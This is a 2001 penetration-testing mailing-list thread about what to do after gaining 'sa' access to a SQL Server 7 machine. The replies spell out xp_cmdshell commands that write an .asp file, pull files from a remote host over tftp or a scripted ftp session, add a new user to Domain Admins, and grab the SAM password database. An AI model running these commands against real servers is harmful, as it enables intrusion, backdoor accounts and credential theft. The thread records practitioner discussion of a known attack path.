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Re: [PEN-TEST] Hacking a server through SQL SERVER 7

From: MadHat <madhat () UNSPECIFIC COM>
Date: Thu, 25 Jan 2001 14:25:41 -0600

At 01:40 PM 1/25/2001 -0500, you wrote:
If I understand your question, try:

xp_cmdshell 'echo filecontent > c:\file.asp'

This will create a file named 'file.asp', with the text 'filecontent' in it.

If UDP port 69 is open, you can use tftp easily

xp_cmdshell 'tftp remotehost get file.asp c:\destination_file.asp'

Or if you can FTP from inside, you can use FTP to grab files off of other
servers from the SQL server with an ftp script.
It has been a while since I played with this, so the syntax may be a little
off, but basically

xp_cmdshell 'echo user > script.file; echo pass >> script.file; echo bin >>
script.file; echo get file.asp >> script.file; echo quit>>script.file; ftp
-s:script.file remotehost'

The script file is line by line what will be sent to the ftp once the
connection is made, if I am not mistaken, so you need the user, the pass
and whatever commands you would use... like

user () here com
get file.asp c:\des_file.asp

so though you can't FTP in, you might be able to FTP out.

Aaron C. Newman

> -----Original Message-----
> From: Penetration Testers [mailto:PEN-TEST () SECURITYFOCUS COM]On Behalf
> Of FiC
> Sent: Thursday, January 25, 2001 4:33 AM
> Subject: Re: [PEN-TEST] Hacking a server through SQL SERVER 7
> Thank you all for your valuable information.
> Is there anyway to upload/create a file in the hacked SQL SERVER
> through the
> system commands? I think that the machine is behind a Firewall
> and even if I
> start the FTP service I can't connect via ftp, and the port 139
> is not open
> or its filtered. I've tried to create an .asp file with the "copy con"
> command, but I can't do it through the SQL console. How can I
> upload/create
> an .asp file to this server?
> Thanx.
> > Once you have access to a MSSQL 7 server via the "sa" account,
> you can do
> > all sorts of fun things:
> >
> > Run system commands:
> >
> > EXEC [master].[dbo].[xp_cmdshell] "net user newuser newpass
> > EXEC [master].[dbo].[xp_cmdshell] "net group 'Domain Admins'
> newuser /ADD
> > /DOMAIN"
> >
> > You can also access the registry, send email, dump system information...
> > Take a look at some of the Extended Stored Procedures in the [master]
> > database with SQL Query Analyzer.  Depending on the user the
> server runs at
> > (normally SYSTEM or Administrator), you can usually use xp_cmdshell to
> > rebuild the repair disk data with rdisk /s and snag the SAM database.
> >
> > I will be giving a presentation at the upcoming CanSecWest conference
> > covering a variety of SQL server attacks, everything from
> general procedure
> > exploitation to insertion techniques.  At the conference, I will be
> > releasing a handful of new tools, one of which exploits the RDS
> component
> > in new ways, allowing access to SQL servers as well as proxying
> requests to
> > internal systems through it.  For more information on the conference,
> > please see, online registration should be
> > available within a few weeks.
> --
> ~/ FiC /~

MadHat at

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